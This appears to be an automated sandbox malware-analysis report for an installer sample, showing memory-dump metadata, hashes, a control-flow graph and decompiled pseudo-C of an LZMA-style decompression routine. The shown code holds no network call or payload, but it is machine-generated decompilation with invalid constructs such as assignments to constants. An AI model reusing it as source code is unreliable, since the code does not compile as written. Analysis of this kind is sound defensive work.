                          • Error launching installer, xrefs: 0040556E
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                          • Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
                          • Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                          • Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 631 406768-40676e 632 406770-406772 631->632 633 406773-406a71 631->633 632->633 635 406a9b-406a9f 633->635 636 406aa1-406ac2 635->636 637 406aff-406b12 635->637 638 406ac4-406ad9 636->638 639 406adb-406aee 636->639 640 406a1b-406a21 637->640 642 406af1-406af8 638->642 639->642 645 4061c6 640->645 646 406bce 640->646 643 406a98 642->643 644 406afa 642->644 643->635 655 406a7d-406a95 644->655 656 406baf 644->656 647 406272-406276 645->647 648 4062e2-4062e6 645->648 649 4061cd-4061d1 645->649 650 40630d-4069b4 645->650 651 406bd1-406bd5 646->651 660 406b22-406b2c 647->660 661 40627c-406295 647->661 657 406b31-406b3b 648->657 658 4062ec-406300 648->658 653 4061d7-4061e4 649->653 654 406bb9-406bcc 649->654 664 4069b6-4069cc 650->664 665 4069ce-4069e4 650->665 653->646 662 4061ea-406230 653->662 654->651 655->643 656->654 657->654 663 406303-40630b 658->663 660->654 666 406298-40629c 661->666 667 406232-406236 662->667 668 406258-40625a 662->668 663->648 663->650 669 4069e7-4069ee 664->669 665->669 666->647 670 40629e-4062a4 666->670 671 406241-40624f GlobalAlloc 667->671 672 406238-40623b GlobalFree 667->672 673 406268-406270 668->673 674 40625c-406266 668->674 675 4069f0-4069f4 669->675 676 406a15 669->676 677 4062a6-4062ad 670->677 678 4062ce-4062e0 670->678 671->646 679 406255 671->679 672->671 673->666 674->673 674->674 680 406ba3-406bad 675->680 681 4069fa-406a12 675->681 676->640 682 4062b8-4062c8 GlobalAlloc 677->682 683 4062af-4062b2 GlobalFree 677->683 678->663 679->668 680->654 681->676 682->646 682->678 683->682
                          C-Code - Quality: 99%
                          			E00406768() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
